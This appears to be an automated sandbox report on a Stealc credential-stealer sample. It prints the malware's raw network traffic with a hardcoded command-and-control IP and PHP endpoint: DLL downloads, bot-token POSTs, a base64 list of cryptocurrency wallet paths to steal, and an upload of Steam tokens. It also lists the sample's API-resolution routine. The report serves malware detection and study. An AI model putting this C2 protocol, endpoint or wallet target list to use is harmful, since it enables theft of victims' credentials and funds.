50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 2, 2024 18:19:31.504643917 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 18:19:31.735872984 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:31 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 2, 2024 18:19:31.978842974 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 18:19:32.209903955 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:32 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 2, 2024 18:19:32.449009895 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHID Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 18:19:33.365864038 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:32 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:33.597313881 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJ Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="message"wallets------AFCFHDHIIIECBGCAKFIJ--
Oct 2, 2024 18:19:33.831414938 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:33 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 2, 2024 18:19:33.880475998 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 2d 2d 0d 0a Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="message"files------GIIDBGDAFHJDHIDGDGII--
Oct 2, 2024 18:19:34.182491064 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 2d 2d 0d 0a Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="message"files------GIIDBGDAFHJDHIDGDGII--
Oct 2, 2024 18:19:34.475713968 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:34 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:34.497726917 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="file"------DGHIECGCBKFHIEBGHDBK--
Oct 2, 2024 18:19:35.217060089 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:34 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:35.241602898 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="message"ybncbhylepme------BKFBAKFCBFHIJJJJDBFC--
Oct 2, 2024 18:19:35.476356983 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:35 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 18:19:35.478038073 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFC Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CAAEBKEGHJKEBFHJDBFC--
Oct 2, 2024 18:19:36.205533028 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:19:35 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	12:19:12
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x340000
File size:	1'830'912 bytes
MD5 hash:	EE7DA1CB43D37F296CC5C5915DBBFDCB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1764315885.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	23.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 00359860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01272170), ref: 003598A1
GetProcAddress.KERNEL32(74DD0000,01272260), ref: 003598BA
GetProcAddress.KERNEL32(74DD0000,012722C0), ref: 003598D2
GetProcAddress.KERNEL32(74DD0000,01272218), ref: 003598EA
GetProcAddress.KERNEL32(74DD0000,012722D8), ref: 00359903
GetProcAddress.KERNEL32(74DD0000,01278EA0), ref: 0035991B
GetProcAddress.KERNEL32(74DD0000,01265690), ref: 00359933
GetProcAddress.KERNEL32(74DD0000,01265990), ref: 0035994C
GetProcAddress.KERNEL32(74DD0000,012722F0), ref: 00359964
GetProcAddress.KERNEL32(74DD0000,012721A0), ref: 0035997C
GetProcAddress.KERNEL32(74DD0000,012723C8), ref: 00359995
GetProcAddress.KERNEL32(74DD0000,01272308), ref: 003599AD
GetProcAddress.KERNEL32(74DD0000,01265870), ref: 003599C5
GetProcAddress.KERNEL32(74DD0000,012723E0), ref: 003599DE
GetProcAddress.KERNEL32(74DD0000,01272380), ref: 003599F6
GetProcAddress.KERNEL32(74DD0000,012657D0), ref: 00359A0E
GetProcAddress.KERNEL32(74DD0000,01272410), ref: 00359A27
GetProcAddress.KERNEL32(74DD0000,01272320), ref: 00359A3F
GetProcAddress.KERNEL32(74DD0000,012658B0), ref: 00359A57
GetProcAddress.KERNEL32(74DD0000,01272338), ref: 00359A70
GetProcAddress.KERNEL32(74DD0000,012656B0), ref: 00359A88
LoadLibraryA.KERNEL32(012724A0,?,00356A00), ref: 00359A9A
LoadLibraryA.KERNEL32(01272440,?,00356A00), ref: 00359AAB
LoadLibraryA.KERNEL32(012724D0,?,00356A00), ref: 00359ABD
LoadLibraryA.KERNEL32(01272458,?,00356A00), ref: 00359ACF
LoadLibraryA.KERNEL32(01272470,?,00356A00), ref: 00359AE0
GetProcAddress.KERNEL32(75A70000,012724E8), ref: 00359B02
GetProcAddress.KERNEL32(75290000,01272488), ref: 00359B23
GetProcAddress.KERNEL32(75290000,012724B8), ref: 00359B3B
GetProcAddress.KERNEL32(75BD0000,01272500), ref: 00359B5D
GetProcAddress.KERNEL32(75450000,01265710), ref: 00359B7E
GetProcAddress.KERNEL32(76E90000,01279010), ref: 00359B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00359BB6

Strings

NtQueryInformationProcess, xrefs: 00359BAA

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: ab4b9f6fa76291a090a3267e70030cc16ee200e467ccf80c57449b1f86eeaaea
Instruction ID: e6b83238ca2af01277eb418c40aa074ab618988316c6f535d4d2c7b71294388a
Opcode Fuzzy Hash: ab4b9f6fa76291a090a3267e70030cc16ee200e467ccf80c57449b1f86eeaaea
Instruction Fuzzy Hash: 08A15BB55002409FF348EFA8ED88A6637F9F768701704651BAE45F3225D739A44AFF22

Function 003445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0034460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0034479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445F3
